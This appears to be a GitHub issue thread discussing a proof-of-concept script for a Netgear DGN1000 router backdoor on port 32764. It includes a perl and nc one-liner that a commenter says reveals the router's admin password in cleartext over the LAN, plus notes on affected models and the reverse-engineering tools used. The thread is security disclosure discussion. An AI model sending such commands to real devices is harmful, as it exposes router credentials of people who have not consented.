DGN1000 #3

grigio opened this Issue Jan 2, 2014 · 6 comments


None yet

3 participants

grigio commented Jan 2, 2014

Your script returns:

Traceback (most recent call last):
  File "backdoorolol.py", line 23, in <module>
    print send_message(s, 2, "http_password")[1]
  File "backdoorolol.py", line 11, in send_message
    sig, ret_val, ret_len = struct.unpack('<III', s.recv(0xC))
struct.error: unpack requires a string argument of length 12

Anyway with DGN1000 Netgear N150 and the script below I'm able to see the password in cleartext.

perl -e 'print pack("(III)<", 0x53634d4d, 0x01, 0x00)' \
| nc 32764

I tried also over internet (with or without remote administration enabled) and it doesn't work, so it seems just a local LAN exploit.


I should have add a little loop and check the length of the returned string :)
I'll update the script. Thank you for reporting the issue.

@elvanderb elvanderb closed this Jan 2, 2014

I'm not sure if there is any difference to the device reported above, but the backdoor is also present in the "Netgear N150 DGN1000B".

By the way: Nice Work! Perhaps could you give some more information about the tools you used?


Thank you I updated the README :)
I just used nmap, google, binwalk, IDA and a patched version of squashfs tools :)

grigio commented Jan 3, 2014

@elvanderb I forgot to ask, do you raccommed other alternative firmwares without this exploit? I tried to look at pfsense and openwrt and it seems this router isn't supported


No, sorry :)


Update: The DGN1000B is the firmware for countries which use Annex B (eg. Germany) for DSL.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment